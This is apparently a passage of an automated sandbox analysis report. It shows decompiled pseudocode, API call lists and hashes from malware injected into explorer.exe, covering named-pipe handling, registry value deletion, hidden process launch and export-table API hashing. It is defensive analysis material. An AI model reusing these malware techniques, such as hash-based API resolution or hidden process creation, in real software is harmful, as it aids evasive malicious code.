        0x000833ae
        0x000833b0
        0x0008332b
        0x0008332c
        0x0008332f
        0x0008337f
        0x00000000
        0x00083331
        0x00083331
        0x00083334
        0x00083369
        0x00000000
        0x00083336
        0x00083336
        0x00083339
        0x00083353
        0x00083358
        0x0008335b
        0x00083386
        0x00083387
        0x00083388
        0x0008335d
        0x0008335d
        0x00083360
        0x00083361
        0x00083361
        0x0008338a
        0x0008338b
        0x0008333b
        0x0008333e
        0x00083348
        0x0008336e
        0x0008336e
        0x00083373
        0x00083374
        0x0008349d
        0x0008349d
        0x0008349e
        0x000834a3
        0x000834a3
        0x0008333e
        0x00083339
        0x00083334
        0x0008332f
        0x00083329
        0x00083320
        0x000834b4
        0x000834bc
        0x00000000
        0x00000000
        0x00000000
        0x000834bc
        0x000834c8

        APIs
        • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
        • GetLastError.KERNEL32 ref: 000832D0
          • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(000001F8), ref: 0008C35F
        • DisconnectNamedPipe.KERNEL32 ref: 000834B4
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
        • String ID:
        • API String ID: 2389948835-0
        • Opcode ID: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
        • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
        • Opcode Fuzzy Hash: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
        • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000861B4, Relevance: 6.1, APIs: 4, Instructions: 145registryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 384 861b4-861f9 memset call 88604 387 861ff-86211 call 88604 384->387 388 86363-86369 384->388 387->388 391 86217-86234 RegOpenKeyExW 387->391 392 8623a-8626d 391->392 393 86333-86337 391->393 398 8627f-86284 392->398 399 8626f-8627a 392->399 394 86339-8633e 393->394 395 86344-86360 call 8861a * 2 393->395 394->395 395->388 398->393 401 8628a 398->401 399->393 404 8628d-862dc memset * 2 401->404 407 862de-862ee 404->407 408 86326-8632d 404->408 410 862f0-86304 407->410 411 86323 407->411 408->393 408->404 410->411 413 86306-86313 call 8c392 410->413 411->408 416 8631c-8631e call 8b1b1 413->416 417 86315-86317 413->417 416->411 417->416
        C-Code - Quality: 80%
        			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E00088604(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00088604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0x9e68c; // 0x133fab8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E0008861A( &_v32, 0x3fff);
					E0008861A( &_v36, 0x800);
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x9e68c; // 0x133fab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x9e68c; // 0x133fab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x9e690; // 0x133fb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x9e68c; // 0x133fab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0008C392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0008B1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x9e68c; // 0x133fab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}
































        0x000861b4
        0x000861b4
        0x000861c0
        0x000861cf
        0x000861d2
        0x000861dc
        0x000861e4
        0x000861e7
        0x000861ef
        0x000861f1
        0x000861f4
        0x000861f9
        0x00086365
        0x00086369
        0x00086369
        0x00086209
        0x0008620b
        0x00086211
        0x00000000
        0x00000000
        0x00086234
        0x00086333
        0x00086337
        0x00086339
        0x00086341
        0x00086341
        0x0008634d
        0x0008635b
        0x00000000
        0x00086360
        0x0008623d
        0x00086241
        0x00086245
        0x00086249
        0x0008624d
        0x0008624e
        0x0008624f
        0x00086250
        0x00086251
        0x00086255
        0x0008625c
        0x0008625d
        0x00086262
        0x0008626d
        0x00086282
        0x00086284
        0x00000000
        0x00000000
        0x0008628a
        0x0008628d
        0x00086295
        0x000862a2
        0x000862a7
        0x000862aa
        0x000862b3
        0x000862ba
        0x000862ca
        0x000862d4
        0x000862da
        0x000862dc
        0x000862e1
        0x000862ea
        0x000862ec
        0x000862ee
        0x000862f0
        0x000862fa
        0x00086300
        0x00086304
        0x00086308
        0x0008630d
        0x00086313
        0x00086315
        0x00086317
        0x00086317
        0x0008631e
        0x0008631e
        0x00086304
        0x00086323
        0x00086323
        0x00086326
        0x00086327
        0x0008632a
        0x0008632a
        0x00000000
        0x0008628d
        0x0008626f
        0x00086277
        0x00000000

        APIs
        • memset.MSVCRT ref: 000861D2
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
        • memset.MSVCRT ref: 00086295
        • memset.MSVCRT ref: 000862A2
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: memset$AllocateHeapOpen
        • String ID:
        • API String ID: 2508404634-0
        • Opcode ID: c23eb431959997662d303becb5b7ae0a239f8e9a3a34986d6a64dad737d24dea
        • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
        • Opcode Fuzzy Hash: c23eb431959997662d303becb5b7ae0a239f8e9a3a34986d6a64dad737d24dea
        • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008A911, Relevance: 6.1, APIs: 4, Instructions: 74processCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 419 8a911-8a941 memset 420 8a94c-8a971 CreateProcessW 419->420 421 8a943-8a948 419->421 422 8a9ae 420->422 423 8a973-8a976 420->423 421->420 424 8a9b0-8a9b6 422->424 425 8a978-8a988 423->425 426 8a996-8a9a6 CloseHandle 423->426 425->426 429 8a98a-8a990 GetExitCodeProcess 425->429 427 8a9ac 426->427 427->424 429->426
        C-Code - Quality: 65%
        			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0x9e684; // 0x133f8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					CloseHandle(_v20.hThread);
					_t32 =  *0x9e684; // 0x133f8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}










        0x0008a91c
        0x0008a925
        0x0008a92c
        0x0008a934
        0x0008a938
        0x0008a939
        0x0008a93a
        0x0008a93b
        0x0008a93c
        0x0008a941
        0x0008a945
        0x0008a948
        0x0008a948
        0x0008a955
        0x0008a971
        0x0008a9ae
        0x0008a973
        0x0008a976
        0x0008a978
        0x0008a97b
        0x0008a980
        0x0008a988
        0x0008a990
        0x0008a990
        0x0008a988
        0x0008a99e
        0x0008a9a1
        0x0008a9a9
        0x0008a9a9
        0x0008a9b6

        APIs
        • memset.MSVCRT ref: 0008A925
        • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
        • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 0008A990
        • CloseHandle.KERNELBASE(?), ref: 0008A99E
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Process$CloseCodeCreateExitHandlememset
        • String ID:
        • API String ID: 2668540068-0
        • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
        • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
        • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
        • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008B012, Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 430 8b012-8b079 memset * 2 SHGetFolderPathW call 8b946 433 8b07c-8b07e 430->433 434 8b0ab-8b0dd call 8c392 lstrcpynW 433->434 435 8b080-8b094 call 8bb8d 433->435 435->434 439 8b096-8b0a7 435->439 439->434
        C-Code - Quality: 87%
        			E0008B012(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0x9e698; // 0x133fbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E0008B946(_t39);
				_t26 =  *0x9e6b8; // 0x133fbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0x9e688; // 0xb0000
					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0x9e698; // 0x133fbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0x9e684; // 0x133f8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
				return 1;
			}
















        0x0008b012
        0x0008b023
        0x0008b035
        0x0008b037
        0x0008b045
        0x0008b054
        0x0008b05f
        0x0008b067
        0x0008b074
        0x0008b07a
        0x0008b07e
        0x0008b080
        0x0008b094
        0x0008b09d
        0x0008b0a8
        0x0008b0a8
        0x0008b094
        0x0008b0ab
        0x0008b0b2
        0x0008b0d0
        0x0008b0dd

        APIs
        • memset.MSVCRT ref: 0008B037
        • memset.MSVCRT ref: 0008B045
        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
          • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
          • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
          • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
        • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
        • String ID:
        • API String ID: 3158470084-0
        • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
        • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
        • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
        • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008BF37, Relevance: 6.1, APIs: 4, Instructions: 72registryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 442 8bf37-8bf66 RegOpenKeyExW 443 8bf68-8bf6a 442->443 444 8bf6c-8bf8a RegQueryValueExW 442->444 445 8bfda-8bfdc 443->445 446 8bf8c-8bf9c call 88604 444->446 447 8bfc7-8bfca 444->447 446->447 453 8bf9e-8bfb8 RegQueryValueExW 446->453 449 8bfcc-8bfd1 447->449 450 8bfd7 447->450 449->450 451 8bfd9 450->451 451->445 454 8bfba-8bfc6 call 8861a 453->454 455 8bfdd-8bfea RegCloseKey 453->455 454->447 455->451
        C-Code - Quality: 100%
        			E0008BF37(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0x9e68c; // 0x133fab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E00088604(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E0008861A( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}










        0x0008bf55
        0x0008bf58
        0x0008bf5b
        0x0008bf66
        0x0008bf8a
        0x0008bfc7
        0x0008bfca
        0x0008bfcc
        0x0008bfd4
        0x0008bfd4
        0x0008bfd7
        0x0008bfd9
        0x00000000
        0x0008bfd9
        0x0008bf94
        0x0008bf96
        0x0008bf9c
        0x00000000
        0x00000000
        0x0008bfb8
        0x0008bfe5
        0x0008bfe8
        0x00000000
        0x0008bfe8
        0x0008bfc0
        0x00000000
        0x0008bfc6
        0x00000000

        APIs
        • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
        • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
        • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
        • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: QueryValue$CloseOpen
        • String ID:
        • API String ID: 1586453840-0
        • Opcode ID: 01e05b04571f0131e572c1f06dd854ee0ee8cafdd31eb164378ba48f19f2f3a3
        • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
        • Opcode Fuzzy Hash: 01e05b04571f0131e572c1f06dd854ee0ee8cafdd31eb164378ba48f19f2f3a3
        • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008BE9B, Relevance: 6.1, APIs: 4, Instructions: 69registryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 458 8be9b-8bec3 RegOpenKeyExA 459 8bec9-8bee6 RegQueryValueExA 458->459 460 8bec5-8bec7 458->460 462 8bee8-8bef7 call 88604 459->462 463 8bf21-8bf24 459->463 461 8bf33-8bf36 460->461 462->463 468 8bef9-8bf13 RegQueryValueExA 462->468 464 8bf31 463->464 465 8bf26-8bf2e RegCloseKey 463->465 464->461 465->464 468->463 469 8bf15-8bf1a 468->469 469->463 470 8bf1c-8bf1f 469->470 470->463
        C-Code - Quality: 100%
        			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E00088604(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}








        0x0008beae
        0x0008beb8
        0x0008bebb
        0x0008bec3
        0x00000000
        0x0008bec5
        0x0008becc
        0x0008bee6
        0x0008bef2
        0x0008bef7
        0x0008bf15
        0x0008bf1a
        0x0008bf1f
        0x0008bf1f
        0x0008bf1a
        0x0008bef7
        0x0008bf24
        0x0008bf2e
        0x0008bf2e
        0x00000000

        APIs
        • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,0133FC08,00000000,?,00000002), ref: 0008BEBE
        • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
        • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
        • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: QueryValue$CloseOpen
        • String ID:
        • API String ID: 1586453840-0
        • Opcode ID: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
        • Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
        • Opcode Fuzzy Hash: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
        • Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00085631, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97sleepsynchronizationCOMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 78%
        			E00085631(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E00089E66(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E0008980C(0x9e6c8);
					_t39 = 0x37; // executed
					E00089F06(_t39);
					_t11 =  *0x9e688; // 0xb0000
					_t40 = 0x3a; // executed
					E00089F06(_t40); // executed
					E0008E4C1(_t63);
					_t14 =  *0x9e688; // 0xb0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0x9e684; // 0x133f8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
					 *0x9e74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0x9e76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E00088604(0x1000);
							_t52 = 0;
							 *0x9e770 = _t34;
							_t49 =  *0x9e774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							__eflags = _t41;
							 *0x9e774 = _t41; // executed
						}
						E0008153B(_t41, _t52); // executed
						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
						E00083017(); // executed
						E000831C2(0, __eflags); // executed
						E000829B1(); // executed
						E00083BB2(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0x9e758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E0008980C(0x9e750);
							_push(0x9e750);
							_push(0x9e750); // executed
							E0008279B();
							Sleep(0xfa0);
						}
						E00083D34();
						E00089A8E();
						E000834CB();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E00082DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

















        0x00085631
        0x0008563d
        0x00085646
        0x00085651
        0x00085656
        0x00085669
        0x0008566a
        0x0008566f
        0x0008567f
        0x00085680
        0x00085688
        0x0008568d
        0x00085692
        0x0008569c
        0x0008569f
        0x000856a9
        0x000856b1
        0x000856b7
        0x000856be
        0x000856d0
        0x000856d6
        0x000856db
        0x000856dd
        0x000856e4
        0x000856e9
        0x000856eb
        0x000856f1
        0x000856f7
        0x000856f9
        0x000856f9
        0x000856fc
        0x000856fc
        0x00085702
        0x00085710
        0x00085717
        0x0008571c
        0x00085721
        0x00085726
        0x00085750
        0x00085750
        0x00085756
        0x00000000
        0x00000000
        0x00085732
        0x00085737
        0x00085738
        0x00085739
        0x0008574a
        0x0008574a
        0x00085758
        0x0008575d
        0x00085762
        0x00085767
        0x00085767
        0x00000000
        0x00000000
        0x00000000
        0x00085648
        0x00085648
        0x0008564d
        0x0008564f
        0x000856c0
        0x000856c2
        0x00000000
        0x00000000
        0x00000000
        0x0008564f
        0x0008576d

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
          • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
          • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
        • Sleep.KERNELBASE(00000FA0), ref: 0008574A
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
        • String ID: fYNa
        • API String ID: 3249252070-137056697
        • Opcode ID: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
        • Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
        • Opcode Fuzzy Hash: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
        • Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 521 8dfad-8dfc4 522 8e021 521->522 523 8dfc6-8dfee 521->523 524 8e023-8e027 522->524 523->522 525 8dff0-8e013 call 8c379 call 8d400 523->525 530 8e028-8e03f 525->530 531 8e015-8e01f 525->531 532 8e041-8e049 530->532 533 8e095-8e097 530->533 531->522 531->525 532->533 534 8e04b 532->534 533->524 535 8e04d-8e053 534->535 536 8e063-8e074 535->536 537 8e055-8e057 535->537 539 8e079-8e085 LoadLibraryA 536->539 540 8e076-8e077 536->540 537->536 538 8e059-8e061 537->538 538->535 538->536 539->522 541 8e087-8e091 GetProcAddress 539->541 540->539 541->522 542 8e093 541->542 542->524
        C-Code - Quality: 100%
        			E0008DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
